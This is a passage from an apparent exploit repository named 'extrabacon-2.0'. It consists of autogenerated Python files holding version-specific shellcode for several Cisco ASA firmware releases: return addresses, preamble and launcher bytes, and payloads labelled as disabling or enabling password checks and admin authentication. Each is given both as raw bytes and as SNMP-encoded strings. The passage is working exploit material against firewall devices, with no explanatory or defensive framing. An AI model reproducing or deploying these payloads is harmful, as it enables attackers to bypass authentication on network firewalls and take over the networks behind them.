"144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.184.170.26.132.9.80.184.149.238.163.173.53.165.165.165.165.255.208.88.195" 55 | 56 | 57 | payload_PMCHECK_DISABLE_len = 66 58 | 59 | payload_PMCHECK_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x45\x8c\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x20\xe3\x29\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 60 | 61 | payload_PMCHECK_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.69.140.172.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.32.227.41.9.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 62 | 63 | 64 | payload_PMCHECK_ENABLE_len = 66 65 | 66 | payload_PMCHECK_ENABLE_byte = "\xeb\x14\xbf\x20\xe3\x29\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x31\xc0\x89\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x45\x8c\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 67 | 68 | payload_PMCHECK_ENABLE_snmp = "235.20.191.32.227.41.9.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.49.192.137.191.165.165.165.165.184.216.165.165.165.49.248.187.165.69.140.172.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 69 | 70 | 71 | payload_AAAADMINAUTH_DISABLE_len = 66 72 | 73 | payload_AAAADMINAUTH_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x75\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x40\xdd\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 74 | 75 | payload_AAAADMINAUTH_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.117.163.173.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.64.221.6.8.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 76 | 77 | 78 | payload_AAAADMINAUTH_ENABLE_len = 66 79 | 80 | payload_AAAADMINAUTH_ENABLE_byte = "\xeb\x14\xbf\x40\xdd\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x89\xe5\x57\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x75\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 81 | 82 | payload_AAAADMINAUTH_ENABLE_snmp = "235.20.191.64.221.6.8.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.137.229.87.191.165.165.165.165.184.216.165.165.165.49.248.187.165.117.163.173.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 83 | 84 | -------------------------------------------------------------------------------- /extrabacon-2.0/versions/shellcode_asa823.py: -------------------------------------------------------------------------------- 1 | # 2 | # this file autogenerated, do not touch 3 | # 4 | 5 | vers = "asa823" 6 | 7 | 8 | my_ret_addr_len = 4 9 | 10 | my_ret_addr_byte = "\x0d\xf6\x12\x09" 11 | 12 | my_ret_addr_snmp = "13.246.18.9" 13 | 14 | 15 | finder_len = 9 16 | 17 | finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90" 18 | 19 | finder_snmp = "139.124.36.20.139.7.255.224.144" 20 | 21 | 22 | preamble_len = 41 23 | 24 | preamble_byte = "\xb8\x59\x8f\x1c\xad\x35\xa5\xa5\xa5\xa5\x83\xec\x04\x89\x04\x24\x89\xe5\x83\xc5\x58\x31\xc0\x31\xdb\xb3\x10\x31\xf6\xbf\xae\xaa\xaa\xaa\x81\xf7\xa5\xa5\xa5\xa5\x60" 25 | 26 | preamble_snmp = "184.89.143.28.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.88.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96" 27 | 28 | 29 | postscript_len = 2 30 | 31 | postscript_byte = "\x61\xc3" 32 | 33 | postscript_snmp = "97.195" 34 | 35 | 36 | successmsg_len = 19 37 | 38 | successmsg_byte = "\xb8\x2e\xb0\x86\x09\x50\xb8\x25\xfa\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58" 39 | 40 | successmsg_snmp = "184.46.176.134.9.80.184.37.250.163.173.53.165.165.165.165.255.208.88" 41 | 42 | 43 | launcher_len = 11 44 | 45 | launcher_byte = "\x8b\x84\x24\xd8\x01\x00\x00\x04\x01\xff\xd0" 46 | 47 | launcher_snmp = "139.132.36.216.1.0.0.4.1.255.208" 48 | 49 | 50 | payload_nop_len = 116 51 | 52 | payload_nop_byte = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\x2e\xb0\x86\x09\x50\xb8\x25\xfa\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58\xc3" 53 | 54 | payload_nop_snmp = "144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.184.46.176.134.9.80.184.37.250.163.173.53.165.165.165.165.255.208.88.195" 55 | 56 | 57 | payload_PMCHECK_DISABLE_len = 66 58 | 59 | payload_PMCHECK_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xc5\x8e\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x80\x6f\x2b\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 60 | 61 | payload_PMCHECK_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.197.142.172.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.128.111.43.9.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 62 | 63 | 64 | payload_PMCHECK_ENABLE_len = 66 65 | 66 | payload_PMCHECK_ENABLE_byte = "\xeb\x14\xbf\x80\x6f\x2b\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x31\xc0\x89\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xc5\x8e\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 67 | 68 | payload_PMCHECK_ENABLE_snmp = "235.20.191.128.111.43.9.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.49.192.137.191.165.165.165.165.184.216.165.165.165.49.248.187.165.197.142.172.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 69 | 70 | 71 | payload_AAAADMINAUTH_DISABLE_len = 66 72 | 73 | payload_AAAADMINAUTH_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x55\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x90\xf1\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 74 | 75 | payload_AAAADMINAUTH_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.85.163.173.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.144.241.6.8.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 76 | 77 | 78 | payload_AAAADMINAUTH_ENABLE_len = 66 79 | 80 | payload_AAAADMINAUTH_ENABLE_byte = "\xeb\x14\xbf\x90\xf1\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x89\xe5\x57\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x55\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 81 | 82 | payload_AAAADMINAUTH_ENABLE_snmp = "235.20.191.144.241.6.8.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.137.229.87.191.165.165.165.165.184.216.165.165.165.49.248.187.165.85.163.173.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 83 | 84 | -------------------------------------------------------------------------------- /extrabacon-2.0/versions/shellcode_asa824.py: -------------------------------------------------------------------------------- 1 | # 2 | # this file autogenerated, do not touch 3 | # 4 | 5 | vers = "asa824" 6 | 7 | 8 | my_ret_addr_len = 4 9 | 10 | my_ret_addr_byte = "\x5d\xac\x31\x09" 11 | 12 | my_ret_addr_snmp = "93.172.49.9" 13 | 14 | 15 | finder_len = 9 16 | 17 | finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90" 18 | 19 | finder_snmp = "139.124.36.20.139.7.255.224.144" 20 | 21 | 22 | preamble_len = 41 23 | 24 | preamble_byte = "\xb8\x49\xfe\x1c\xad\x35\xa5\xa5\xa5\xa5\x83\xec\x04\x89\x04\x24\x89\xe5\x83\xc5\x58\x31\xc0\x31\xdb\xb3\x10\x31\xf6\xbf\xae\xaa\xaa\xaa\x81\xf7\xa5\xa5\xa5\xa5\x60" 25 | 26 | preamble_snmp = "184.73.254.28.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.88.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96" 27 | 28 | 29 | postscript_len = 2 30 | 31 | postscript_byte = "\x61\xc3" 32 | 33 | postscript_snmp = "97.195" 34 | 35 | 36 | successmsg_len = 19 37 | 38 | successmsg_byte = "\xb8\xce\x09\x87\x09\x50\xb8\x45\xfa\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58" 39 | 40 | successmsg_snmp = "184.206.9.135.9.80.184.69.250.163.173.53.165.165.165.165.255.208.88" 41 | 42 | 43 | launcher_len = 11 44 | 45 | launcher_byte = "\x8b\x84\x24\xd8\x01\x00\x00\x04\x01\xff\xd0" 46 | 47 | launcher_snmp = "139.132.36.216.1.0.0.4.1.255.208" 48 | 49 | 50 | payload_nop_len = 116 51 | 52 | payload_nop_byte = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\xce\x09\x87\x09\x50\xb8\x45\xfa\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58\xc3" 53 | 54 | payload_nop_snmp = "144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.184.206.9.135.9.80.184.69.250.163.173.53.165.165.165.165.255.208.88.195" 55 | 56 | 57 | payload_PMCHECK_DISABLE_len = 66 58 | 59 | payload_PMCHECK_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x15\x8e\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x60\xbb\x2b\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 60 | 61 | payload_PMCHECK_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.21.142.172.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.96.187.43.9.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 62 | 63 | 64 | payload_PMCHECK_ENABLE_len = 66 65 | 66 | payload_PMCHECK_ENABLE_byte = "\xeb\x14\xbf\x60\xbb\x2b\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x31\xc0\x89\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x15\x8e\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 67 | 68 | payload_PMCHECK_ENABLE_snmp = "235.20.191.96.187.43.9.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.49.192.137.191.165.165.165.165.184.216.165.165.165.49.248.187.165.21.142.172.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 69 | 70 | 71 | payload_AAAADMINAUTH_DISABLE_len = 66 72 | 73 | payload_AAAADMINAUTH_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x55\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x10\xf2\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 74 | 75 | payload_AAAADMINAUTH_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.85.163.173.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.16.242.6.8.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 76 | 77 | 78 | payload_AAAADMINAUTH_ENABLE_len = 66 79 | 80 | payload_AAAADMINAUTH_ENABLE_byte = "\xeb\x14\xbf\x10\xf2\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x89\xe5\x57\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x55\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 81 | 82 | payload_AAAADMINAUTH_ENABLE_snmp = "235.20.191.16.242.6.8.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.137.229.87.191.165.165.165.165.184.216.165.165.165.49.248.187.165.85.163.173.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 83 | 84 | -------------------------------------------------------------------------------- /extrabacon-2.0/versions/shellcode_asa825.py: -------------------------------------------------------------------------------- 1 | # 2 | # this file autogenerated, do not touch 3 | # 4 | 5 | vers = "asa825" 6 | 7 | 8 | my_ret_addr_len = 4 9 | 10 | my_ret_addr_byte = "\xfd\x0d\x36\x09" 11 | 12 | my_ret_addr_snmp = "253.13.54.9" 13 | 14 | 15 | finder_len = 9 16 | 17 | finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90" 18 | 19 | finder_snmp = "139.124.36.20.139.7.255.224.144" 20 | 21 | 22 | preamble_len = 41 23 | 24 | preamble_byte = "\xb8\x39\x40\x1c\xad\x35\xa5\xa5\xa5\xa5\x83\xec\x04\x89\x04\x24\x89\xe5\x83\xc5\x58\x31\xc0\x31\xdb\xb3\x10\x31\xf6\xbf\xae\xaa\xaa\xaa\x81\xf7\xa5\xa5\xa5\xa5\x60" 25 | 26 | preamble_snmp = "184.57.64.28.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.88.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96" 27 | 28 | 29 | postscript_len = 2 30 | 31 | postscript_byte = "\x61\xc3" 32 | 33 | postscript_snmp = "97.195" 34 | 35 | 36 | successmsg_len = 19 37 | 38 | successmsg_byte = "\xb8\x2e\x14\x8c\x09\x50\xb8\xb5\xc5\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58" 39 | 40 | successmsg_snmp = "184.46.20.140.9.80.184.181.197.163.173.53.165.165.165.165.255.208.88" 41 | 42 | 43 | launcher_len = 11 44 | 45 | launcher_byte = "\x8b\x84\x24\xd8\x01\x00\x00\x04\x01\xff\xd0" 46 | 47 | launcher_snmp = "139.132.36.216.1.0.0.4.1.255.208" 48 | 49 | 50 | payload_nop_len = 116 51 | 52 | payload_nop_byte = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\x2e\x14\x8c\x09\x50\xb8\xb5\xc5\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58\xc3" 53 | 54 | payload_nop_snmp = "144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.184.46.20.140.9.80.184.181.197.163.173.53.165.165.165.165.255.208.88.195" 55 | 56 | 57 | payload_PMCHECK_DISABLE_len = 66 58 | 59 | payload_PMCHECK_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xb5\x95\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x60\x1c\x30\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 60 | 61 | payload_PMCHECK_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.181.149.172.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.96.28.48.9.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 62 | 63 | 64 | payload_PMCHECK_ENABLE_len = 66 65 | 66 | payload_PMCHECK_ENABLE_byte = "\xeb\x14\xbf\x60\x1c\x30\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x31\xc0\x89\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xb5\x95\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 67 | 68 | payload_PMCHECK_ENABLE_snmp = "235.20.191.96.28.48.9.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.49.192.137.191.165.165.165.165.184.216.165.165.165.49.248.187.165.181.149.172.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 69 | 70 | 71 | payload_AAAADMINAUTH_DISABLE_len = 66 72 | 73 | payload_AAAADMINAUTH_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x55\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x40\xf2\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 74 | 75 | payload_AAAADMINAUTH_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.85.163.173.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.64.242.6.8.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 76 | 77 | 78 | payload_AAAADMINAUTH_ENABLE_len = 66 79 | 80 | payload_AAAADMINAUTH_ENABLE_byte = "\xeb\x14\xbf\x40\xf2\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x89\xe5\x57\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x55\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 81 | 82 | payload_AAAADMINAUTH_ENABLE_snmp = "235.20.191.64.242.6.8.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.137.229.87.191.165.165.165.165.184.216.165.165.165.49.248.187.165.85.163.173.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 83 | 84 | -------------------------------------------------------------------------------- /extrabacon-2.0/versions/shellcode_asa831.py: -------------------------------------------------------------------------------- 1 | # 2 | # this file autogenerated, do not touch 3 | # 4 | 5 | vers = "asa831" 6 | 7 | 8 | my_ret_addr_len = 4 9 | 10 | my_ret_addr_byte = "\x9d\xf3\x4a\x09" 11 | 12 | my_ret_addr_snmp = "157.243.74.9" 13 | 14 | 15 | finder_len = 9 16 | 17 | finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90" 18 | 19 | finder_snmp = "139.124.36.20.139.7.255.224.144" 20 | 21 | 22 | preamble_len = 41 23 | 24 | preamble_byte = "\xb8\x29\x29\x67\xad\x35\xa5\xa5\xa5\xa5\x83\xec\x04\x89\x04\x24\x89\xe5\x83\xc5\x58\x31\xc0\x31\xdb\xb3\x10\x31\xf6\xbf\xae\xaa\xaa\xaa\x81\xf7\xa5\xa5\xa5\xa5\x60" 25 | 26 | preamble_snmp = "184.41.41.103.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.88.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96" 27 | 28 | 29 | postscript_len = 2 30 | 31 | postscript_byte = "\x61\xc3" 32 | 33 | postscript_snmp = "97.195" 34 | 35 | 36 | successmsg_len = 19 37 | 38 | successmsg_byte = "\xb8\x0a\x8c\x91\x09\x50\xb8\xd5\xe9\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58" 39 | 40 | successmsg_snmp = "184.10.140.145.9.80.184.213.233.163.173.53.165.165.165.165.255.208.88" 41 | 42 | 43 | launcher_len = 11 44 | 45 | launcher_byte = "\x8b\x84\x24\xd8\x01\x00\x00\x04\x01\xff\xd0" 46 | 47 | launcher_snmp = "139.132.36.216.1.0.0.4.1.255.208" 48 | 49 | 50 | payload_nop_len = 116 51 | 52 | payload_nop_byte = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\x0a\x8c\x91\x09\x50\xb8\xd5\xe9\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58\xc3" 53 | 54 | payload_nop_snmp = "144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.184.10.140.145.9.80.184.213.233.163.173.53.165.165.165.165.255.208.88.195" 55 | 56 | 57 | payload_PMCHECK_DISABLE_len = 66 58 | 59 | payload_PMCHECK_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xd5\x90\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\xf0\x77\x35\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 60 | 61 | payload_PMCHECK_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.213.144.172.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.240.119.53.9.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 62 | 63 | 64 | payload_PMCHECK_ENABLE_len = 66 65 | 66 | payload_PMCHECK_ENABLE_byte = "\xeb\x14\xbf\xf0\x77\x35\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x31\xc0\x89\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xd5\x90\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 67 | 68 | payload_PMCHECK_ENABLE_snmp = "235.20.191.240.119.53.9.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.49.192.137.191.165.165.165.165.184.216.165.165.165.49.248.187.165.213.144.172.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 69 | 70 | 71 | payload_AAAADMINAUTH_DISABLE_len = 66 72 | 73 | payload_AAAADMINAUTH_DISABLE_byte = 